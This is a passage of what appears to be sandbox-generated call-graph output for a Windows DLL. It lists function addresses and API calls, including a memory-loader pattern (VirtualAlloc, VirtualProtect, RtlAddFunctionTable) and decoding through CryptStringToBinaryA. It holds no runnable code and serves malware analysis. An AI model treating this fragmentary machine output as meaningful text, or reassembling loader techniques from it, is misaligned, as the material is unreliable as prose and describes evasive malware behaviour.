18174->18177 18175->18176 18176->18069 18176->18071 18177->18173 18177->18174 18178 7ff87c1097ec new 2 API calls 18177->18178 18178->18177 18180 7ff87c10cc24 49 API calls 18179->18180 18181 7ff87c10d2f5 18180->18181 18183 7ff87c10d332 IsValidCodePage 18181->18183 18187 7ff87c10d375 __scrt_fastfail 18181->18187 18182 7ff87c103a70 _UnwindNestedFrames 8 API calls 18184 7ff87c10d091 18182->18184 18185 7ff87c10d343 18183->18185 18183->18187 18184->18074 18184->18078 18186 7ff87c10d37a GetCPInfo 18185->18186 18189 7ff87c10d34c __scrt_fastfail 18185->18189 18186->18187 18186->18189 18187->18182 18238 7ff87c10cd3c 18189->18238 18321 7ff87c10bd28 EnterCriticalSection 18190->18321 18207 7ff87c10b2d4 18206->18207 18213 7ff87c10b2cf 18206->18213 18208 7ff87c10b8d4 FindHandler 47 API calls 18207->18208 18207->18213 18209 7ff87c10b2ef 18208->18209 18214 7ff87c10b440 18209->18214 18213->18168 18213->18169 18215 7ff87c10b312 18214->18215 18216 7ff87c10b455 18214->18216 18218 7ff87c10b4ac 18215->18218 18216->18215 18222 7ff87c10f224 18216->18222 18219 7ff87c10b4c1 18218->18219 18220 7ff87c10b4d4 18218->18220 18219->18220 18235 7ff87c10d2ac 18219->18235 18220->18213 18223 7ff87c10b8d4 FindHandler 47 API calls 18222->18223 18224 7ff87c10f233 18223->18224 18225 7ff87c10f27e 18224->18225 18234 7ff87c10bd28 EnterCriticalSection 18224->18234 18225->18215 18236 7ff87c10b8d4 FindHandler 47 API calls 18235->18236 18237 7ff87c10d2b5 18236->18237 18239 7ff87c10cd79 GetCPInfo 18238->18239 18240 7ff87c10ce6f 18238->18240 18239->18240 18245 7ff87c10cd8c 18239->18245 18241 7ff87c103a70 _UnwindNestedFrames 8 API calls 18240->18241 18243 7ff87c10cf0e 18241->18243 18243->18187 18249 7ff87c10ed54 18245->18249 18250 7ff87c10b2b0 47 API calls 18249->18250 18251 7ff87c10ed96 18250->18251 18269 7ff87c10d63c 18251->18269 18270 7ff87c10d644 MultiByteToWideChar 18269->18270 18323 7ff87c10a989 18322->18323 18324 7ff87c10a993 18322->18324 18323->18324 18329 7ff87c10a9ae 18323->18329 18325 7ff87c10b420 _set_errno_from_matherr 11 API calls 18324->18325 18326 7ff87c10a99a 18325->18326 18328 7ff87c109744 _invalid_parameter_noinfo 47 API calls 18326->18328 18327 7ff87c10a9a6 18327->18035 18328->18327 18329->18327 18330 7ff87c10b420 _set_errno_from_matherr 11 API calls 18329->18330 18330->18326 18332 7ff87c10a1a9 18331->18332 18333 7ff87c10a1f1 18331->18333 18332->18037 18334 7ff87c10a21a 18333->18334 18335 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18333->18335 18336 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18334->18336 18335->18333 18336->18332 17096 e10000 17099 e1015a 17096->17099 17097 e1033f GetNativeSystemInfo 17098 e10377 VirtualAlloc 17097->17098 17101 e108eb 17097->17101 17104 e10395 17098->17104 17099->17097 17099->17101 17100 e10873 17100->17101 17102 e108c6 RtlAddFunctionTable 17100->17102 17102->17101 17103 e1084b VirtualProtect 17103->17104 17104->17100 17104->17103 17105 7ff87c104394 17106 7ff87c1043ba 17105->17106 17107 7ff87c1043d1 dllmain_raw 17106->17107 17108 7ff87c1043f1 17106->17108 17110 7ff87c1043c2 17106->17110 17109 7ff87c1043e4 17107->17109 17107->17110 17108->17110 17154 7ff87c113fb0 17108->17154 17122 7ff87c104194 17109->17122 17114 7ff87c10443e 17114->17110 17116 7ff87c104194 84 API calls 17114->17116 17115 7ff87c113fb0 75 API calls 17117 7ff87c104424 17115->17117 17118 7ff87c104454 17116->17118 17119 7ff87c104194 84 API calls 17117->17119 17118->17110 17120 7ff87c10445e dllmain_raw 17118->17120 17121 7ff87c104431 dllmain_raw 17119->17121 17120->17110 17121->17114 17123 7ff87c10419c 17122->17123 17129 7ff87c1041d5 __scrt_acquire_startup_lock 17122->17129 17124 7ff87c1041a1 17123->17124 17125 7ff87c1041c9 17123->17125 17126 7ff87c1041a6 17124->17126 17127 7ff87c1041bc __scrt_dllmain_crt_thread_attach 17124->17127 17188 7ff87c103f18 17125->17188 17131 7ff87c1041ab 17126->17131 17203 7ff87c103e58 17126->17203 17132 7ff87c1041ba 17127->17132 17128 7ff87c10432e 17128->17108 17129->17128 17134 7ff87c104359 17129->17134 17135 7ff87c104944 __scrt_fastfail 7 API calls 17129->17135 17131->17108 17132->17108 17215 7ff87c103ed4 17134->17215 17135->17134 17137 7ff87c10435e 17220 7ff87c103f04 17137->17220 17138 7ff87c104206 __scrt_acquire_startup_lock 17140 7ff87c104232 17138->17140 17150 7ff87c10420a __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 17138->17150 17208 7ff87c104944 IsProcessorFeaturePresent 17138->17208 17196 7ff87c103e18 17140->17196 17141 7ff87c104369 __scrt_release_startup_lock 17224 7ff87c1040f0 17141->17224 17145 7ff87c104241 _RTC_Initialize 17145->17150 17199 7ff87c10416c 17145->17199 17149 7ff87c10425b 17151 7ff87c10416c shared_ptr 50 API calls 17149->17151 17150->17108 17152 7ff87c104267 __scrt_initialize_default_local_stdio_options 17151->17152 17152->17150 17153 7ff87c104283 __scrt_dllmain_after_initialize_c 17152->17153 17153->17150 17155 7ff87c113fee __scrt_fastfail __std_exception_destroy new 17154->17155 17179 7ff87c113fe9 17154->17179 17471 7ff87c119970 17155->17471 17159 7ff87c1191fd 17160 7ff87c119970 49 API calls 17159->17160 17161 7ff87c119217 std::_Container_base12::~_Container_base12 17160->17161 17594 7ff87c119410 17161->17594 17165 7ff87c119268 17166 7ff87c101540 47 API calls 17165->17166 17167 7ff87c119275 17166->17167 17168 7ff87c119382 __scrt_fastfail 17167->17168 17169 7ff87c119282 17167->17169 17602 7ff87c119510 17168->17602 17610 7ff87c119f00 17169->17610 17173 7ff87c1192bb LoadStringW LoadStringW 17615 7ff87c113ed0 LoadCursorW RegisterClassExW 17173->17615 17174 7ff87c11929f MessageBoxA 17174->17179 17177 7ff87c119510 48 API calls 17177->17179 17178 7ff87c119308 17616 7ff87c113cb0 CreateWindowExW 17178->17616 17626 7ff87c103a70 17179->17626 17182 7ff87c11932d GetMessageW 17184 7ff87c119372 CoUninitialize 17182->17184 17185 7ff87c119344 TranslateAcceleratorW 17182->17185 17183 7ff87c119320 CoUninitialize 17183->17179 17184->17179 17186 7ff87c11935a TranslateMessage DispatchMessageW 17185->17186 17187 7ff87c119370 17185->17187 17186->17187 17187->17182 17189 7ff87c103f3a __isa_available_init 17188->17189 17228 7ff87c106ac0 17189->17228 17192 7ff87c103f43 17192->17138 17315 7ff87c103f64 17196->17315 17198 7ff87c103e23 17198->17145 17320 7ff87c10411c 17199->17320 17201 7ff87c104175 17202 7ff87c104b40 InitializeSListHead 17201->17202 17335 7ff87c10a86c 17203->17335 17209 7ff87c104969 __scrt_fastfail 17208->17209 17210 7ff87c104985 RtlCaptureContext RtlLookupFunctionEntry 17209->17210 17211 7ff87c1049ae RtlVirtualUnwind 17210->17211 17212 7ff87c1049ea __scrt_fastfail 17210->17212 17211->17212 17213 7ff87c104a1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17212->17213 17214 7ff87c104a6e 17213->17214 17214->17140 17216 7ff87c103edd __scrt_acquire_startup_lock 17215->17216 17218 7ff87c103ef1 17216->17218 17463 7ff87c10a334 17216->17463 17218->17137 17221 7ff87c103f0f 17220->17221 17222 7ff87c1070b0 __vcrt_uninitialize_ptd 6 API calls 17221->17222 17223 7ff87c106b45 17222->17223 17223->17141 17226 7ff87c104101 __scrt_uninitialize_crt 17224->17226 17225 7ff87c104113 17225->17128 17226->17225 17227 7ff87c106b1c __vcrt_uninitialize 8 API calls 17226->17227 17227->17225 17229 7ff87c106ac9 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 17228->17229 17248 7ff87c107974 17229->17248 17231 7ff87c103f3f 17231->17192 17236 7ff87c10a844 17231->17236 17237 7ff87c10e02c 17236->17237 17238 7ff87c103f4c 17237->17238 17299 7ff87c10dfb0 17237->17299 17238->17192 17240 7ff87c106b1c 17238->17240 17241 7ff87c106b35 17240->17241 17242 7ff87c106b24 17240->17242 17241->17192 17243 7ff87c1070b0 __vcrt_uninitialize_ptd 6 API calls 17242->17243 17244 7ff87c106b29 17243->17244 17245 7ff87c1079bc __vcrt_uninitialize_locks DeleteCriticalSection 17244->17245 17246 7ff87c106b2e 17245->17246 17311 7ff87c107de4 17246->17311 17249 7ff87c10797c 17248->17249 17251 7ff87c1079ad 17249->17251 17252 7ff87c106ad3 17249->17252 17265 7ff87c107d20 17249->17265 17253 7ff87c1079bc __vcrt_uninitialize_locks DeleteCriticalSection 17251->17253 17252->17231 17254 7ff87c107070 17252->17254 17253->17252 17280 7ff87c107bbc 17254->17280 17256 7ff87c107080 17257 7ff87c106ae0 17256->17257 17285 7ff87c107cb8 17256->17285 17257->17231 17261 7ff87c1079bc 17257->17261 17259 7ff87c10709d 17259->17257 17290 7ff87c1070b0 17259->17290 17262 7ff87c1079e7 17261->17262 17263 7ff87c1079eb 17262->17263 17264 7ff87c1079ca DeleteCriticalSection 17262->17264 17263->17231 17264->17262 17270 7ff87c1079f4 17265->17270 17268 7ff87c107d77 InitializeCriticalSectionAndSpinCount 17269 7ff87c107d63 17268->17269 17269->17249 17271 7ff87c107a55 17270->17271 17272 7ff87c107a5a 17270->17272 17271->17272 17273 7ff87c107a8d LoadLibraryExW 17271->17273 17278 7ff87c107b22 17271->17278 17279 7ff87c107b00 FreeLibrary 17271->17279 17272->17268 17272->17269 17273->17271 17275 7ff87c107ab3 GetLastError 17273->17275 17274 7ff87c107b31 GetProcAddress 17274->17272 17276 7ff87c107b49 17274->17276 17275->17271 17277 7ff87c107abe LoadLibraryExW 17275->17277 17276->17272 17277->17271 17278->17272 17278->17274 17279->17271 17281 7ff87c1079f4 try_get_function 5 API calls 17280->17281 17282 7ff87c107be8 17281->17282 17283 7ff87c107bff TlsAlloc 17282->17283 17284 7ff87c107bf0 17282->17284 17283->17284 17284->17256 17286 7ff87c1079f4 try_get_function 5 API calls 17285->17286 17287 7ff87c107ceb 17286->17287 17288 7ff87c107d04 TlsSetValue 17287->17288 17289 7ff87c107cf3 17287->17289 17288->17289 17289->17259 17291 7ff87c1070bf 17290->17291 17292 7ff87c1070c4 17290->17292 17294 7ff87c107c10 17291->17294 17292->17257 17295 7ff87c1079f4 try_get_function 5 API calls 17294->17295 17296 7ff87c107c3b 17295->17296 17297 7ff87c107c51 TlsFree 17296->17297 17298 7ff87c107c43 17296->17298 17297->17298 17298->17292 17310 7ff87c10bd28 EnterCriticalSection 17299->17310 17301 7ff87c10dfc0 17302 7ff87c11060c 53 API calls 17301->17302 17303 7ff87c10dfc9 17302->17303 17304 7ff87c10ddb8 55 API calls 17303->17304 17309 7ff87c10dfd7 17303->17309 17306 7ff87c10dfd2 17304->17306 17305 7ff87c10bd7c new LeaveCriticalSection 17307 7ff87c10dfe3 17305->17307 17308 7ff87c10dea8 GetStdHandle GetFileType 17306->17308 17307->17237 17308->17309 17309->17305 17312 7ff87c107e1c 17311->17312 17314 7ff87c107de8 17311->17314 17312->17241 17313 7ff87c107e02 FreeLibrary 17313->17314 17314->17312 17314->17313 17316 7ff87c104022 17315->17316 17319 7ff87c103f7c __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 17315->17319 17317 7ff87c104944 __scrt_fastfail 7 API calls 17316->17317 17318 7ff87c10402c 17317->17318 17319->17198 17321 7ff87c10414b 17320->17321 17323 7ff87c104141 _onexit 17320->17323 17324 7ff87c10a6bc 17321->17324 17323->17201 17327 7ff87c10a2f8 17324->17327 17334 7ff87c10bd28 EnterCriticalSection 17327->17334 17341 7ff87c10b890 17335->17341 17338 7ff87c106b08 17450 7ff87c106f4c 17338->17450 17342 7ff87c103e61 17341->17342 17343 7ff87c10b8a1 FlsGetValue 17341->17343 17342->17338 17343->17342 17344 7ff87c10b8ae FlsSetValue 17343->17344 17348 7ff87c10b730 17344->17348 17349 7ff87c10b77a 17348->17349 17350 7ff87c10b772 17348->17350 17351 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17349->17351 17352 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17350->17352 17353 7ff87c10b787 17351->17353 17352->17349 17354 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17353->17354 17355 7ff87c10b794 17354->17355 17356 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17355->17356 17357 7ff87c10b7a1 17356->17357 17358 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17357->17358 17359 7ff87c10b7ae 17358->17359 17360 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17359->17360 17361 7ff87c10b7bb 17360->17361 17362 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17361->17362 17363 7ff87c10b7c8 17362->17363 17364 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17363->17364 17365 7ff87c10b7d5 17364->17365 17366 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17365->17366 17367 7ff87c10b7e5 17366->17367 17368 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17367->17368 17369 7ff87c10b7f5 17368->17369 17380 7ff87c10b5e0 17369->17380 17394 7ff87c10bd28 EnterCriticalSection 17380->17394 17451 7ff87c103e66 17450->17451 17452 7ff87c106f60 17450->17452 17451->17132 17453 7ff87c106f6a 17452->17453 17458 7ff87c107c64 17452->17458 17455 7ff87c107cb8 __vcrt_FlsSetValue 6 API calls 17453->17455 17456 7ff87c106f7a 17455->17456 17456->17451 17457 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17456->17457 17457->17451 17459 7ff87c1079f4 try_get_function 5 API calls 17458->17459 17460 7ff87c107c8f 17459->17460 17461 7ff87c107ca5 TlsGetValue 17460->17461 17462 7ff87c107c97 17460->17462 17461->17462 17462->17453 17470 7ff87c10bd28 EnterCriticalSection 17463->17470 17635 7ff87c101710 17471->17635 17478 7ff87c101540 47 API calls 17479 7ff87c1199f7 17478->17479 17480 7ff87c102970 49 API calls 17479->17480 17481 7ff87c119a13 17480->17481 17482 7ff87c101580 49 API calls 17481->17482 17483 7ff87c119a2a 17482->17483 17484 7ff87c101540 47 API calls 17483->17484 17485 7ff87c119a37 17484->17485 17486 7ff87c102970 49 API calls 17485->17486 17487 7ff87c119a53 17486->17487 17488 7ff87c101580 49 API calls 17487->17488 17489 7ff87c119a6a 17488->17489 17490 7ff87c101540 47 API calls 17489->17490 17491 7ff87c119a77 17490->17491 17492 7ff87c102970 49 API calls 17491->17492 17493 7ff87c119a93 17492->17493 17494 7ff87c101580 49 API calls 17493->17494 17495 7ff87c119aaa 17494->17495 17496 7ff87c101540 47 API calls 17495->17496 17497 7ff87c119ab7 17496->17497 17498 7ff87c102970 49 API calls 17497->17498 17499 7ff87c119ad3 17498->17499 17500 7ff87c101580 49 API calls 17499->17500 17501 7ff87c119aea 17500->17501 17502 7ff87c101540 47 API calls 17501->17502 17503 7ff87c119af7 17502->17503 17504 7ff87c102970 49 API calls 17503->17504 17505 7ff87c119b13 17504->17505 17506 7ff87c101580 49 API calls 17505->17506 17507 7ff87c119b2a 17506->17507 17508 7ff87c101540 47 API calls 17507->17508 17509 7ff87c119b37 17508->17509 17510 7ff87c102970 49 API calls 17509->17510 17511 7ff87c119b53 17510->17511 17512 7ff87c101580 49 API calls 17511->17512 17513 7ff87c119b6a 17512->17513 17514 7ff87c101540 47 API calls 17513->17514 17515 7ff87c119b77 17514->17515 17516 7ff87c102970 49 API calls 17515->17516 17517 7ff87c119b93 17516->17517 17518 7ff87c101580 49 API calls 17517->17518 17519 7ff87c119baa 17518->17519 17520 7ff87c101540 47 API calls 17519->17520 17521 7ff87c119bb7 17520->17521 17522 7ff87c102970 49 API calls 17521->17522 17523 7ff87c119bd3 17522->17523 17524 7ff87c101580 49 API calls 17523->17524 17525 7ff87c119bea 17524->17525 17526 7ff87c101540 47 API calls 17525->17526 17527 7ff87c119bf7 17526->17527 17528 7ff87c102970 49 API calls 17527->17528 17529 7ff87c119c13 17528->17529 17530 7ff87c101580 49 API calls 17529->17530 17531 7ff87c119c2a 17530->17531 17532 7ff87c101540 47 API calls 17531->17532 17533 7ff87c119c37 17532->17533 17534 7ff87c102970 49 API calls 17533->17534 17535 7ff87c119c53 17534->17535 17536 7ff87c101580 49 API calls 17535->17536 17537 7ff87c119c6a 17536->17537 17538 7ff87c101540 47 API calls 17537->17538 17539 7ff87c119c77 17538->17539 17540 7ff87c102970 49 API calls 17539->17540 17541 7ff87c119c93 17540->17541 17542 7ff87c101580 49 API calls 17541->17542 17543 7ff87c119cb0 17542->17543 17544 7ff87c101540 47 API calls 17543->17544 17545 7ff87c119cbd 17544->17545 17546 7ff87c102970 49 API calls 17545->17546 17547 7ff87c119cd9 17546->17547 17548 7ff87c101580 49 API calls 17547->17548 17549 7ff87c119cf6 17548->17549 17550 7ff87c101540 47 API calls 17549->17550 17551 7ff87c119d03 17550->17551 17552 7ff87c102970 49 API calls 17551->17552 17553 7ff87c119d1f 17552->17553 17554 7ff87c101580 49 API calls 17553->17554 17555 7ff87c119d3c 17554->17555 17556 7ff87c101540 47 API calls 17555->17556 17557 7ff87c119d49 17556->17557 17558 7ff87c102970 49 API calls 17557->17558 17559 7ff87c119d65 17558->17559 17560 7ff87c101580 49 API calls 17559->17560 17561 7ff87c119d82 17560->17561 17562 7ff87c101540 47 API calls 17561->17562 17563 7ff87c119d8f 17562->17563 17564 7ff87c102970 49 API calls 17563->17564 17565 7ff87c119dab 17564->17565 17566 7ff87c101580 49 API calls 17565->17566 17567 7ff87c119dc8 17566->17567 17568 7ff87c101540 47 API calls 17567->17568 17569 7ff87c119dd5 17568->17569 17570 7ff87c102970 49 API calls 17569->17570 17571 7ff87c119df1 17570->17571 17572 7ff87c101580 49 API calls 17571->17572 17573 7ff87c119e0e 17572->17573 17574 7ff87c101540 47 API calls 17573->17574 17575 7ff87c119e1b 17574->17575 17576 7ff87c102970 49 API calls 17575->17576 17577 7ff87c119e37 17576->17577 17578 7ff87c101580 49 API calls 17577->17578 17579 7ff87c119e54 17578->17579 17580 7ff87c101540 47 API calls 17579->17580 17581 7ff87c119e61 17580->17581 17582 7ff87c102970 49 API calls 17581->17582 17583 7ff87c119e7d 17582->17583 17584 7ff87c101580 49 API calls 17583->17584 17585 7ff87c119e9a 17584->17585 17586 7ff87c101540 47 API calls 17585->17586 17587 7ff87c119ea7 17586->17587 17665 7ff87c1016a0 17587->17665 17590 7ff87c101540 47 API calls 17591 7ff87c119ed4 17590->17591 17592 7ff87c103a70 _UnwindNestedFrames 8 API calls 17591->17592 17593 7ff87c119eec 17592->17593 17593->17159 17595 7ff87c119437 CryptStringToBinaryA 17594->17595 17598 7ff87c119239 17594->17598 17596 7ff87c119476 new 17595->17596 17595->17598 17597 7ff87c1194b9 CryptStringToBinaryA 17596->17597 17596->17598 17597->17598 17599 7ff87c101540 17598->17599 17600 7ff87c101910 type_info::_name_internal_method 47 API calls 17599->17600 17601 7ff87c101561 Concurrency::details::WorkQueue::IsStructuredEmpty 17600->17601 17601->17165 17909 7ff87c1091b8 17602->17909 17605 7ff87c1091b8 47 API calls 17606 7ff87c11954e 17605->17606 17607 7ff87c1091b8 47 API calls 17606->17607 17608 7ff87c11955e VirtualAlloc 17607->17608 17609 7ff87c1193bd 17608->17609 17609->17177 17938 7ff87c119f40 17610->17938 17612 7ff87c119f11 17613 7ff87c11928c CoInitialize 17612->17613 17614 7ff87c119f24 ExitProcess 17612->17614 17613->17173 17613->17174 17615->17178 17617 7ff87c113d4c 17616->17617 17618 7ff87c113d53 RegisterTouchWindow 17616->17618 17617->17182 17617->17183 17619 7ff87c113d64 MessageBoxW 17618->17619 17620 7ff87c113d87 17618->17620 17619->17617 17621 7ff87c113d93 CoCreateInstance 17620->17621 17621->17617 17622 7ff87c113dc6 17621->17622 17962 7ff87c103d6c 17622->17962 17624 7ff87c113dd0 17624->17617 17625 7ff87c113e9b ShowWindow UpdateWindow 17624->17625 17625->17617 17627 7ff87c103a7a 17626->17627 17628 7ff87c103a86 17627->17628 17629 7ff87c103b04 IsProcessorFeaturePresent 17627->17629 17628->17114 17628->17115 17630 7ff87c103b1b 17629->17630 17976 7ff87c103cf8 RtlCaptureContext 17630->17976 17636 7ff87c101731 17635->17636 17671 7ff87c101910 17636->17671 17638 7ff87c101741 17675 7ff87c101b10 17638->17675 17641 7ff87c102970 17837 7ff87c101760 17641->17837 17643 7ff87c1029ad char_traits 17841 7ff87c102cc0 17643->17841 17645 7ff87c1029e2 17845 7ff87c102e90 17645->17845 17650 7ff87c1016a0 47 API calls 17651 7ff87c102a12 17650->17651 17652 7ff87c101540 47 API calls 17651->17652 17653 7ff87c102a27 17652->17653 17654 7ff87c103a70 _UnwindNestedFrames 8 API calls 17653->17654 17655 7ff87c102a39 17654->17655 17656 7ff87c101580 17655->17656 17657 7ff87c1015a7 17656->17657 17658 7ff87c101677 17656->17658 17659 7ff87c101910 type_info::_name_internal_method 47 API calls 17657->17659 17658->17478 17660 7ff87c1015b6 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::HardwareAffinity::operator!= 17659->17660 17661 7ff87c10167a 17660->17661 17662 7ff87c10163d 17660->17662 17878 7ff87c101f00 17661->17878 17874 7ff87c102a90 17662->17874 17666 7ff87c1016c1 Concurrency::details::WorkQueue::IsStructuredEmpty shared_ptr 17665->17666 17667 7ff87c101910 type_info::_name_internal_method 47 API calls 17666->17667 17668 7ff87c1016e8 17667->17668 17669 7ff87c101f00 47 API calls 17668->17669 17670 7ff87c101701 17669->17670 17670->17590 17672 7ff87c10192b type_info::_name_internal_method 17671->17672 17673 7ff87c101930 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17671->17673 17672->17638 17673->17672 17679 7ff87c102100 17673->17679 17676 7ff87c101b28 char_traits 17675->17676 17747 7ff87c101b40 17676->17747 17678 7ff87c101750 17678->17641 17682 7ff87c102880 17679->17682 17685 7ff87c1013a0 17682->17685 17684 7ff87c102127 17684->17672 17686 7ff87c1013cd 17685->17686 17687 7ff87c1013c8 17685->17687 17689 7ff87c10146b 17686->17689 17690 7ff87c101409 17686->17690 17691 7ff87c109764 _invalid_parameter_noinfo_noreturn 47 API calls 17686->17691 17697 7ff87c109764 17687->17697 17689->17684 17692 7ff87c101435 17690->17692 17693 7ff87c109764 _invalid_parameter_noinfo_noreturn 47 API calls 17690->17693 17691->17690 17694 7ff87c101450 17692->17694 17695 7ff87c109764 _invalid_parameter_noinfo_noreturn 47 API calls 17692->17695 17693->17692 17694->17689 17696 7ff87c109764 _invalid_parameter_noinfo_noreturn 47 API calls 17694->17696 17695->17694 17696->17689 17702 7ff87c1095d8 17697->17702 17703 7ff87c109603 17702->17703 17714 7ff87c109674 17703->17714 17705 7ff87c10962a 17706 7ff87c10964d 17705->17706 17724 7ff87c1090d0 17705->17724 17708 7ff87c109662 17706->17708 17709 7ff87c1090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17706->17709 17710 7ff87c109794 IsProcessorFeaturePresent 17708->17710 17709->17708 17711 7ff87c1097a7 17710->17711 17739 7ff87c109474 17711->17739 17715 7ff87c1093bc _invalid_parameter_noinfo_noreturn 18 API calls 17714->17715 17716 7ff87c10969e 17715->17716 17717 7ff87c109428 _invalid_parameter_noinfo_noreturn GetLastError SetLastError 17716->17717 17718 7ff87c1096af 17716->17718 17719 7ff87c1096fb 17717->17719 17718->17705 17719->17718 17720 7ff87c109794 _invalid_parameter_noinfo_noreturn 17 API calls 17719->17720 17721 7ff87c109742 17720->17721 17722 7ff87c1095d8 _invalid_parameter_noinfo_noreturn 47 API calls 17721->17722 17723 7ff87c10975d 17722->17723 17723->17705 17725 7ff87c109128 17724->17725 17726 7ff87c1090df GetLastError 17724->17726 17725->17706 17727 7ff87c1090f4 17726->17727 17728 7ff87c10bb14 _invalid_parameter_noinfo_noreturn 16 API calls 17727->17728 17729 7ff87c10910e SetLastError 17728->17729 17729->17725 17730 7ff87c109131 17729->17730 17731 7ff87c10aa78 FindHandler 45 API calls 17730->17731 17732 7ff87c109136 17731->17732 17733 7ff87c1090d0 _invalid_parameter_noinfo_noreturn 45 API calls 17732->17733 17734 7ff87c109157 17733->17734 17735 7ff87c10b474 _invalid_parameter_noinfo_noreturn 45 API calls 17734->17735 17736 7ff87c10917f 17735->17736 17737 7ff87c10b4e0 _invalid_parameter_noinfo_noreturn 45 API calls 17736->17737 17738 7ff87c10918f 17737->17738 17738->17706 17740 7ff87c1094ae __scrt_fastfail _invalid_parameter_noinfo_noreturn 17739->17740 17741 7ff87c1094d6 RtlCaptureContext RtlLookupFunctionEntry 17740->17741 17742 7ff87c109510 RtlVirtualUnwind 17741->17742 17743 7ff87c109546 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17741->17743 17742->17743 17746 7ff87c109598 _invalid_parameter_noinfo_noreturn 17743->17746 17744 7ff87c103a70 _UnwindNestedFrames 8 API calls 17745 7ff87c1095b7 GetCurrentProcess TerminateProcess 17744->17745 17746->17744 17748 7ff87c101b62 type_info::_name_internal_method 17747->17748 17749 7ff87c101b97 17748->17749 17750 7ff87c101b69 Concurrency::details::ContextBase::GetWorkQueueIdentity 17748->17750 17754 7ff87c1022b0 17749->17754 17763 7ff87c101bf0 17750->17763 17753 7ff87c101b95 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17753->17678 17755 7ff87c1022cd type_info::_name_internal_method 17754->17755 17756 7ff87c1022de type_info::_name_internal_method 17755->17756 17779 7ff87c102230 17755->17779 17758 7ff87c1022f2 type_info::_name_internal_method 17756->17758 17761 7ff87c102310 type_info::_name_internal_method 17756->17761 17773 7ff87c102600 17758->17773 17760 7ff87c10230e type_info::_name_internal_method 17760->17753 17761->17760 17762 7ff87c101910 type_info::_name_internal_method 47 API calls 17761->17762 17762->17760 17816 7ff87c1021f0 17763->17816 17765 7ff87c101c17 type_info::_name_internal_method 17766 7ff87c101c6c 17765->17766 17767 7ff87c101c3c 17765->17767 17769 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17766->17769 17820 7ff87c102520 17767->17820 17772 7ff87c101c6a Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17769->17772 17770 7ff87c101c59 17823 7ff87c102450 17770->17823 17772->17753 17776 7ff87c102640 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 17773->17776 17775 7ff87c101910 type_info::_name_internal_method 47 API calls 17778 7ff87c1027c2 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method 17775->17778 17782 7ff87c1028e0 17776->17782 17777 7ff87c102760 Concurrency::details::ContextBase::GetWorkQueueIdentity char_traits 17777->17775 17778->17760 17799 7ff87c104e9c 17779->17799 17785 7ff87c102930 17782->17785 17788 7ff87c1012b0 17785->17788 17789 7ff87c1012de 17788->17789 17798 7ff87c1012d4 17788->17798 17790 7ff87c1012f8 17789->17790 17791 7ff87c104e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17789->17791 17792 7ff87c10137c 17790->17792 17794 7ff87c10131c 17790->17794 17791->17790 17793 7ff87c103d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17792->17793 17793->17798 17795 7ff87c10133b 17794->17795 17796 7ff87c104e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17794->17796 17797 7ff87c103d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17795->17797 17796->17795 17797->17798 17798->17777 17804 7ff87c104c70 17799->17804 17803 7ff87c104ebe 17812 7ff87c106d48 17804->17812 17806 7ff87c104ca7 17807 7ff87c106e00 17806->17807 17808 7ff87c106e6e RtlPcToFileHeader 17807->17808 17811 7ff87c106e4c 17807->17811 17809 7ff87c106e93 17808->17809 17810 7ff87c106eae RaiseException 17808->17810 17809->17810 17810->17803 17811->17808 17813 7ff87c106d9e __std_exception_destroy 17812->17813 17814 7ff87c106d69 new 17812->17814 17813->17806 17814->17813 17815 7ff87c10a97c __std_exception_copy 47 API calls 17814->17815 17815->17813 17817 7ff87c102208 type_info::_name_internal_method 17816->17817 17818 7ff87c10221c 17817->17818 17826 7ff87c1025e0 17817->17826 17818->17765 17821 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17820->17821 17822 7ff87c10253d type_info::_name_internal_method 17821->17822 17822->17770 17824 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17823->17824 17825 7ff87c102472 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17824->17825 17825->17772 17829 7ff87c104ec0 17826->17829 17834 7ff87c104d3c 17829->17834 17832 7ff87c106e00 _CxxThrowException 2 API calls 17833 7ff87c104ee2 17832->17833 17835 7ff87c106d48 __std_exception_copy 47 API calls 17834->17835 17836 7ff87c104d73 17835->17836 17836->17832 17838 7ff87c10177c 17837->17838 17839 7ff87c101910 type_info::_name_internal_method 47 API calls 17838->17839 17840 7ff87c10178c 17839->17840 17840->17643 17842 7ff87c102cd8 type_info::_name_internal_method 17841->17842 17843 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17842->17843 17844 7ff87c102d1a 